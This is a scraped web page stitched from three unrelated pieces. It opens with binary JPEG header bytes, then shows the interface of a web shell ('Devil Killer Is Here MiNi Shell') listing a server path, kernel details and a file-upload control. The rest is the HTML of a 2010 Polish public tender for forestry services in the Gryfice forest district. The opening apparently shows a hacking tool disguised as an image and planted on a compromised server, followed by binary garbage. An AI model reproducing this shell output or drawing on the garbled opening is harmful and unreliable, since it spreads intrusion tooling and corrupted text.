JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101124/382174-N-2010.html

<p class="kh_header"><b>Gryfice: Wykonanie usług leśnych w Nadleśnictwie Gryfice w roku 2011</b><br>
<b>Numer ogłoszenia: 382174 - 2010; data zamieszczenia: 24.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Gryfice , Osada Zdrój 1, 72-300 Gryfice, tel. 091 3843321; 3842516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.lasy.gov.pl/gryfice</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Gryfice.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług leśnych w Nadleśnictwie Gryfice w roku 2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług leśnych w Nadleśnictwie Gryfice z zakresu zagospodarowania lasu, pozyskania i zrywki drewna, a także szkółkarstwa w roku 2011.
Przedmiot zamówienia jest podzielony na następujące części, zwane dalej pakietami:
Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław;
Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce
Leśnej Nadleśnictwa Gryfice;
Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć;
Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Pobierowo, Niczonów, Jatki;
Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino;
Szczegółowy opis przedmiotu zamówienia, z wyszczególnieniem poszczególnych pozycji (prac) tworzących dany pakiet oraz miejsc ich wykonywania (adresów leśnych) w roku 2011 określa załącznik nr 7 do SIWZ.
Szczegółowy opis czynności składających się na poszczególne pozycje (prace) określają katalogi norm czasu stanowiące załącznik nr 8 do SIWZ wprowadzone Zarządzeniem nr 99 Dyrektora Generalnego Lasów Państwowych z dnia 21 listopada 2003 r.
Zamówienie będzie realizowane w okresie 1 stycznia 2011 r. - 31 grudnia 2011 r., jednakże w przypadku, gdy umowa w sprawie zamówienia publicznego zostanie podpisana po 01 stycznia 2011 r. zamówienie będzie realizowane od dnia podpisania umowy do 31 grudnia 2011 r. Terminy wykonania poszczególnych prace w każdym z pakietów nr 1 - 5 będą określane w zleceniach wystawianych przez upoważnionych przedstawicieli Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający, w stosunku do zamówień określonych w pakietach 1 - 5, przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP, w wysokości nie przekraczającej 50% wartości zamówienia podstawowego, liczonych odrębnie dla każdego z pakietów.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium na poszczególne pakiety w następujących kwotach:
1) Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław - 9.700,00 zł
2) Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice - 16.000,00 zł
3) Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć - 16.800,00 zł
4) Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Pobierowo, Niczonów, Jatki - 12.600,00 zł
5) Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino - 11.900,00 zł.
Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1) pieniądzu
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że
poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275,
z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: BGŻ S.A. Oddz. Operacyjny w Gryficach 80 2030 0045 1110 0000 0054 4290. Wadium w formie gotówki nie będzie przyjmowane.
Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego (p. 7).
Wadium należy wnieść w terminie do dnia 16.12.2010 do godz. 8:00. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego.
W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą.
W przypadku wniesienia wadium w formie gwarancji/poręczenia, gwarancja/poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku
lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,
2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,
3) kwotę gwarancji/poręczenia,
4) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie
Zamawiającego w okolicznościach określonych w art. 46 ust. 4a PZP oraz art. 46 ust. 5 PZP. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z
zastrzeżeniem art. 46 ust.4a PZP
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art.46 ust.1 PZP, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie wykonawcy.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli w odpowiedzi na wezwanie,o którym mowa w art. 26 ust. 3 PZP, wykonawca nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych na podstawie specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia. Niespełnienie przez Wykonawcę warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do poszczególnych pakietów Zamawiający uzna za spełnione warunki udziału w postępowaniu jeżeli Wykonawca przedstawi następujące informacje:
Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław-wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 prac polegających na jednoczesnym wykonywaniu usług
z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę nie mniejszą niż 40.000,00 zł (brutto) każda
Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice - wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę nie mniejszą niż 60.000,00 zł (brutto) każda,
Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć - wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę nie mniejszą niż 70.000,00 zł (brutto) każda;
Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Pobierowo, Niczonów, Jatki - wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę nie mniejszą niż 50.000,00 zł (brutto) każda;
Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino - wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 prac polegających na jednoczesnym wykonywaniu usług
z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę nie mniejszą niż 50.000,00 zł (brutto) każda.
Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych na podstawie  specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia. Niespełnienie przez Wykonawcę warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który:
Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia: 
-	1 ciągnikiem typu skider, np.: LKT przystosowanym do zrywki półpodwieszonej drewna dłużycowego;
-	2 przyczepami (wózkami) do zrywki nasiębiernej drewna z mechanicznym załadunkiem
Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia: 
-	1 ciągnikiem typu skider, np.: LKT przystosowanym do zrywki półpodwieszonej drewna dłużycowego;
-	2 przyczepami (wózkami) do zrywki nasiębiernej drewna z mechanicznym załadunkiem;
Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia: 
-	1 ciągnikiem typu skider, np.: LKT przystosowanym do zrywki półpodwieszonej drewna dłużycowego;
-	2 przyczepami (wózkami) do zrywki nasiębiernej drewna z mechanicznym załadunkiem;
Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach  Pobierowo, Niczonów, Jatki dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia: 
-	1 ciągnikiem typu skider, np.: LKT przystosowanym do zrywki półpodwieszonej drewna dłużycowego;
-	2 przyczepami (wózkami) do zrywki nasiębiernej drewna z mechanicznym załadunkiem;
Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino dysponuje następującymi narzędziami i urządzeniami niezbędnymi do wykonania zamówienia: 
-	1 ciągnikiem typu skider, np.: LKT przystosowanym do zrywki półpodwieszonej drewna dłużycowego;
-	2 przyczepami (wózkami) do zrywki nasiębiernej drewna z mechanicznym załadunkiem
Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych na podstawie specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia. Niespełnienie przez Wykonawcę warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który:
Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław dysponuje co najmniej 6 osobami z zaświadczeniami o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej - Dz. U. z 2006 r. Nr 161, poz 1141)
Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice dysponuje co najmniej 8 osobami z zaświadczeniami o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej - Dz. U. z 2006 r. Nr 161, poz. 1141) oraz co najmniej 1 osobą posiadającą aktualne zaświadczenie o ukończeniu szkolenia w zakresie stosowania środków ochrony roślin (art. 74 ustawy z dnia 18 grudnia 2003 r. o ochronie roślin - tekst jedn. Dz. U. z 2008 r. Nr 133, poz. 849 z późn. zm.)
Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć dysponuje co najmniej 11 osobami z zaświadczeniami o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej - Dz. U. z 2006 r. Nr 161, poz 1141)
Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach  Pobierowo, Niczonów, Jatki dysponuje co najmniej 7 osobami z zaświadczeniami o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej - Dz. U. z 2006 r. Nr 161, poz 1141)
Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino dysponuje co najmniej 8 osobami z zaświadczeniami o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej - Dz. U. z 2006 r. Nr 161, poz 1141)
Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych na podstawie specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia. Niespełnienie przez Wykonawcę warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który:
Pakiet nr 1 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Mrzeżyno, Gosław 
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.
- posiada środki finansowe w wysokości co najmniej 15.000,00 zł lub zdolność kredytową w wysokości co najmniej 15.000,00 zł
Pakiet nr 2 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Raduń, Górzyca, Lubin oraz na Szkółce Leśnej Nadleśnictwa Gryfice
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.
- posiada środki finansowe w wysokości co najmniej 15.000,00 zł lub zdolność kredytową w wysokości co najmniej 15.000,00 zł. 
Pakiet nr 3 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Prusinowo, Rybokarty, Kołomąć
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.
- posiada środki finansowe w wysokości co najmniej 15.000,00 zł lub zdolność kredytową w wysokości co najmniej 15.000,00 zł. 
Pakiet nr 4 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach  Pobierowo, Niczonów, Jatki
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.
- posiada środki finansowe w wysokości co najmniej 15.000,00 zł lub zdolność kredytową w wysokości co najmniej 15.000,00 zł. 
Pakiet nr 5 - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno, Chomino
- posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 50.000,00 zł.
- posiada środki finansowe w wysokości co najmniej 15.000,00 zł lub zdolność kredytową w wysokości co najmniej 15.000,00 zł
Ocena spełniania warunków udziału w postępowaniu oraz ocena braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie dokumentów wymaganych na podstawie specyfikacji istotnych warunków zamówienia, złożonych przez Wykonawcę wraz z jego ofertą, w oparciu o zasadę spełnia - nie spełnia. Niespełnienie przez Wykonawcę warunku skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

